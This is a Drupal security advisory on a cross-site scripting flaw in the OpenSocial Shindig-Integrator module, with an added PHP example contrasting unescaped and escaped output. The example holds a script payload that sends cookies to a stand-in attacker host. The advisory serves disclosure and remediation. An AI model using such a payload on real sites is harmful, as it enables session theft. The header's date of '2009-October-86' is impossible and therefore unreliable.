  • Advisory ID: DRUPAL-SA-CONTRIB-2009-086
  • Project: OpenSocial Shindig-Integrator (third-party module)
  • Version: 6.x, 5.x
  • Date: 2009-October-86
  • Security risk: Moderately Critical
  • Exploitable from: Remote
  • Vulnerability: Cross Site Scripting

Description

The OpenSocial Shindig-Integrator module enables sites to host OpenSocial widgets.

The module does not sanitize user-supplied input before outputting it, making it vulnerable to cross-site scripting (XSS) attacks. The impact is limited by the fact that an attacker needs an account with the "create application" permission on the site.
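The class of bug is easiest to see side by side. The following is an added illustration, not code from the OpenSocial Shindig-Integrator module or from the Drupal project: it assumes a hypothetical application record with a user-supplied title and contrasts emitting it raw with escaping it via Drupal 6's check_plain(). The check_plain() stub is only so the script runs outside Drupal; inside Drupal the real function is used.

```php
<?php
// Added example, not the module's code. Models a hypothetical "application"
// record whose title was entered by a user holding "create application".

// Outside Drupal, stand in for Drupal 6's check_plain() (simplified: the real
// function also rejects invalid UTF-8 before escaping).
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Constructed attacker-controlled input (hypothetical payload).
$app = (object) array(
  'title' => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
);

// Vulnerable pattern: user input concatenated into markup unchanged, so the
// browser executes the injected script for every visitor who views the page.
function render_app_vulnerable($app) {
  return '<h2>' . $app->title . '</h2>';
}

// Hardened pattern: escape on output, so the same input renders as text.
function render_app_fixed($app) {
  return '<h2>' . check_plain($app->title) . '</h2>';
}

echo render_app_vulnerable($app), "\n";
echo render_app_fixed($app), "\n";
```

Run with `php example.php`: the first line reproduces the raw script tag, the second shows it with `<`, `>` and `"` encoded as entities. Until the upgrade below is applied, reviewing which roles hold the "create application" permission bounds who can reach the vulnerable path.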

Versions affected

Drupal core is not affected. If you do not use the contributed OpenSocial Shindig-Integrator module, there is nothing you need to do.

Solution

Install the latest version or disable the module.

  • If you use the OpenSocial Shindig-Integrator module for Drupal 6.x, upgrade to OpenSocial Shindig-Integrator 6.x-2.1.
  • If you use the OpenSocial Shindig-Integrator module for Drupal 5.x, disable the module and uninstall it. The 5.x branch is no longer supported.

Reported by

  • Tony Mobily

Fixed by

Contact

The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.